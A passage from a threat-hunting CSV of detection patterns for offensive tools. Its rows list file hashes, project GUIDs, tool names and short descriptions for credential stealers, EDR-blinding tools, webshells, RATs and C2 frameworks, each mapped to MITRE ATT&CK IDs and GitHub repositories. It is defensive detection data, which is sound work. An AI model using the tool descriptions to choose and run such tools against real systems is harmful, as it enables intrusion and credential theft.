T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29770" "*7EAE7E78-ED95-4CAB-B3B3-231B41BB5AA0*",".{0,1000}7EAE7E78\-ED95\-4CAB\-B3B3\-231B41BB5AA0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29771" "*7eafe227a92bd29f811ecf7457d7170ffe65962b5048a8b431c68bc1121fac21*",".{0,1000}7eafe227a92bd29f811ecf7457d7170ffe65962b5048a8b431c68bc1121fac21.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","29772" "*7eb2d2b7d0eaf25f822afa65e9887683ad2c1dd48c2cc447a76a6526222acf06*",".{0,1000}7eb2d2b7d0eaf25f822afa65e9887683ad2c1dd48c2cc447a76a6526222acf06.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","29773" "*7ebe05cf3029272503d357300458d6bf36cde819120533d8ed84c1f9888dfc94*",".{0,1000}7ebe05cf3029272503d357300458d6bf36cde819120533d8ed84c1f9888dfc94.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","29777" "*7ec9b36feeace5d4903be2adb2e1454af948a393c311b5513bfad0e9995b87e7*",".{0,1000}7ec9b36feeace5d4903be2adb2e1454af948a393c311b5513bfad0e9995b87e7.{0,1000}","offensive_tool_keyword","DecryptTeamViewer","Enumerate and decrypt TeamViewer credentials from Windows registry","T1552.001 - T1003 - T1119 - T1012","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/V1V1/DecryptTeamViewer","1","0","#filehash","N/A","7","3","241","62","2021-12-05T09:19:56Z","2020-02-07T07:50:47Z","29782" "*7ed7d9c107405d53c44b675f0c2cbb042388f49801d90a55d4820d83fa908d91",".{0,1000}7ed7d9c107405d53c44b675f0c2cbb042388f49801d90a55d4820d83fa908d91","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#filehash","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","29783" "*7ee2ae92197926fc349bebbf9c6065aa54f994234d543a58725f4dda99699afa*",".{0,1000}7ee2ae92197926fc349bebbf9c6065aa54f994234d543a58725f4dda99699afa.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","#filehash","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","29786" "*7EE536AE-6C1D-4881-88F7-37C8F2A0CA50*",".{0,1000}7EE536AE\-6C1D\-4881\-88F7\-37C8F2A0CA50.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/binderlabs/DirCreate2System","1","0","#GUIDproject","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","29787" "*7ee75a2b8e9ac772f17dfc622e4f5011507648c0dc4c863e69a019ffff1da55c*",".{0,1000}7ee75a2b8e9ac772f17dfc622e4f5011507648c0dc4c863e69a019ffff1da55c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29788" "*7ef63c297547732a817bb5372198a567ad572fe7b0093d69c68c443af4c055b4*",".{0,1000}7ef63c297547732a817bb5372198a567ad572fe7b0093d69c68c443af4c055b4.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29789" "*7ef6a655e0c09263822565e5022ff3bd33494f1bedc2062862f769ebd2c93897*",".{0,1000}7ef6a655e0c09263822565e5022ff3bd33494f1bedc2062862f769ebd2c93897.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#filehash","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","29790" 
"*7efd3d96188347367d021982adb458d1ab44d27dc5d3a3ac44e984481af2ad32*",".{0,1000}7efd3d96188347367d021982adb458d1ab44d27dc5d3a3ac44e984481af2ad32.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29791" "*7etsuo/ShellServe*",".{0,1000}7etsuo\/ShellServe.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","1","N/A","N/A","6","","N/A","","","","29793" "*7f005c1ea9c2021b5db5807fdf9e8e9f502b28f089ff17dc85b7d480a3e3d143*",".{0,1000}7f005c1ea9c2021b5db5807fdf9e8e9f502b28f089ff17dc85b7d480a3e3d143.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","29794" "*7f04947064e9386df22e3d4da45d2687c13b1490de3669c5d3f1087698392cd9*",".{0,1000}7f04947064e9386df22e3d4da45d2687c13b1490de3669c5d3f1087698392cd9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT 
samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29796" "*7f049ca9ba7182193eb8c129ea0b090d498a2978fa66e36ceeab62e0be124592*",".{0,1000}7f049ca9ba7182193eb8c129ea0b090d498a2978fa66e36ceeab62e0be124592.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","29797" "*7f093d1243dd87e82bbaf8ef261269466ca01a142b6a52c6fa145a8ec4ba3e3d*",".{0,1000}7f093d1243dd87e82bbaf8ef261269466ca01a142b6a52c6fa145a8ec4ba3e3d.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#filehash","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","29799" "*7f0b1f1e301cdf0058203bbaee22dae51f023e73409ac60278da05cfa0fa7a23*",".{0,1000}7f0b1f1e301cdf0058203bbaee22dae51f023e73409ac60278da05cfa0fa7a23.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29800" "*7f0ed3a7c9e2ece2c8cb6a9e889774e7616dba199a4bb2e1cfb9d425d41ae199*",".{0,1000}7f0ed3a7c9e2ece2c8cb6a9e889774e7616dba199a4bb2e1cfb9d425d41ae199.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29801" "*7f0f9593260859c0e292aa1b76d618a71c83a1d26ba802ba7853f4637d1922e6*",".{0,1000}7f0f9593260859c0e292aa1b76d618a71c83a1d26ba802ba7853f4637d1922e6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29802" 
"*7f16b72d7c9bcef82978a2c926e7b3b204b372d40c0b3e06f9673b200f2174aa*",".{0,1000}7f16b72d7c9bcef82978a2c926e7b3b204b372d40c0b3e06f9673b200f2174aa.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29803" "*7f18b60690bd7e02064e1e8f6bec4496c77f6b33d2efcac94b16314919d0e2dc*",".{0,1000}7f18b60690bd7e02064e1e8f6bec4496c77f6b33d2efcac94b16314919d0e2dc.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29804" "*7f1a5a5648f8105399e932839d8e73274e98349da3765e9cb388c005edad93a2*",".{0,1000}7f1a5a5648f8105399e932839d8e73274e98349da3765e9cb388c005edad93a2.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","29805" "*7f21ed0e3b0f5dbc1b1415b85df5c0c125c64aac320d9f23de6e120ab2285110*",".{0,1000}7f21ed0e3b0f5dbc1b1415b85df5c0c125c64aac320d9f23de6e120ab2285110.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29807" "*7f2b0703267297d62119fe11c3f8846f9fafa906b6da577e4480f5fc4914c3e1*",".{0,1000}7f2b0703267297d62119fe11c3f8846f9fafa906b6da577e4480f5fc4914c3e1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29810" "*7f3c414abe39b6e9ab37c48d5962f421ea91971a21f3eb1a9ff1789fafc6649e*",".{0,1000}7f3c414abe39b6e9ab37c48d5962f421ea91971a21f3eb1a9ff1789fafc6649e.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","#filehash","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","29812" "*7f3e3d8e8a2f6be44925fe45ec065c0d3f5d8c578e5dc436e677462d53efb2b9*",".{0,1000}7f3e3d8e8a2f6be44925fe45ec065c0d3f5d8c578e5dc436e677462d53efb2b9.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","29813" "*7f461d71b6833275b34bd49c459e07cc6a71aa7263db7fbcaceaf6c154300858*",".{0,1000}7f461d71b6833275b34bd49c459e07cc6a71aa7263db7fbcaceaf6c154300858.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - 
TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29814" "*7f4cb93deb3d53403cc8f23e7d07ad8a8ff7c327ba9362eeb330e5489649da8e*",".{0,1000}7f4cb93deb3d53403cc8f23e7d07ad8a8ff7c327ba9362eeb330e5489649da8e.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","#filehash","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","29817" "*7f5ac429cd84d6ac935855b8a7656b830a6eefa1884f7fddd8c7c893c6b09ca4*",".{0,1000}7f5ac429cd84d6ac935855b8a7656b830a6eefa1884f7fddd8c7c893c6b09ca4.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","#filehash","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","29820" "*7f5bf0735a01899a8420d4247508aa7f09af346cb434baa5cdf024200ebf4f35*",".{0,1000}7f5bf0735a01899a8420d4247508aa7f09af346cb434baa5cdf024200ebf4f35.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29821" "*7f5d5571d141b858ce93d450002ac8c78b7d9141498771c2579407569dee1464*",".{0,1000}7f5d5571d141b858ce93d450002ac8c78b7d9141498771c2579407569dee1464.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a 
post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","29823" "*7f64f0074988005bfda114e773e9cfcd9fe700f37c779105205153430d514ab6*",".{0,1000}7f64f0074988005bfda114e773e9cfcd9fe700f37c779105205153430d514ab6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29824" "*7f73a800a012c6b522a92074901c256d947a7a080bc2efb3da65784b2f50a054*",".{0,1000}7f73a800a012c6b522a92074901c256d947a7a080bc2efb3da65784b2f50a054.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","29826" "*7f861f80620136ae0418cecf780c0c4896b4e7b8763cbaa232104ec7b99acdf5*",".{0,1000}7f861f80620136ae0418cecf780c0c4896b4e7b8763cbaa232104ec7b99acdf5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29828" "*7f8e123e9191b4e2299eb159da8776f51430445847529ff1f01b469acb04be2b*",".{0,1000}7f8e123e9191b4e2299eb159da8776f51430445847529ff1f01b469acb04be2b.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","29829" "*7f94002b26b9570c8cf791cb5adf2b721b678c1b1e07a40ca4aa39c5633b3d15*",".{0,1000}7f94002b26b9570c8cf791cb5adf2b721b678c1b1e07a40ca4aa39c5633b3d15.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29830" "*7f994093b3133e5450cd89d4a9cc39cceca8bbcce8845665f86b4d7eb9998d61*",".{0,1000}7f994093b3133e5450cd89d4a9cc39cceca8bbcce8845665f86b4d7eb9998d61.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","#filehash","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","29831" "*7f99e59cb3242638aa4967180674b98dd770fae51a85ff364238faf52e02a586*",".{0,1000}7f99e59cb3242638aa4967180674b98dd770fae51a85ff364238faf52e02a586.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","#filehash","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","29832" "*7f9d8f3147127bd0bbce2ac04a05747ca2a7ce962c2584b5be197ee75fcad18c*",".{0,1000}7f9d8f3147127bd0bbce2ac04a05747ca2a7ce962c2584b5be197ee75fcad18c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29833" "*7fa350350fc1735a9b6f162923df8d960daffb73d6f5470df3c3317ae237a4e6*",".{0,1000}7fa350350fc1735a9b6f162923df8d960daffb73d6f5470df3c3317ae237a4e6.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - 
APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","29834" "*7fa4e734f5dddd6e3e912dda25a744ffa615735a9e65ac1319412cd4fb91d1cc*",".{0,1000}7fa4e734f5dddd6e3e912dda25a744ffa615735a9e65ac1319412cd4fb91d1cc.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","29836" "*7fa5122ff9fabaf2676064087eacaf4a63b386bb27d50ac345ff4bdbe6a4f7d5*",".{0,1000}7fa5122ff9fabaf2676064087eacaf4a63b386bb27d50ac345ff4bdbe6a4f7d5.{0,1000}","offensive_tool_keyword","ACEshark","uncover potential privilege escalation vectors by analyzing windows service configurations and Access Control Entries","T1058 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/t3l3machus/ACEshark","1","0","#filehash","N/A","6","2","109","19","2025-01-15T07:01:48Z","2024-12-28T10:42:29Z","29837" "*7fa6c0c97030dea92f7fc81f4fee7bbf42e4fe914832ffb0ce22fe001928ae67*",".{0,1000}7fa6c0c97030dea92f7fc81f4fee7bbf42e4fe914832ffb0ce22fe001928ae67.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29838" "*7fa9f247b1b89382e6eedc622dbd5951f088cfff0dc517f3c7f0bb4519c30e7c*",".{0,1000}7fa9f247b1b89382e6eedc622dbd5951f088cfff0dc517f3c7f0bb4519c30e7c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - 
KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29839" "*7fb6399a2b17a066190f2eb003a9ce46ebc23fd1c93ab912738067782618e0af*",".{0,1000}7fb6399a2b17a066190f2eb003a9ce46ebc23fd1c93ab912738067782618e0af.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29843" "*7fcb7a2af36c0dff045a30ff301ff523f8140fd7b35010991fe05e6f16c5a45d*",".{0,1000}7fcb7a2af36c0dff045a30ff301ff523f8140fd7b35010991fe05e6f16c5a45d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered 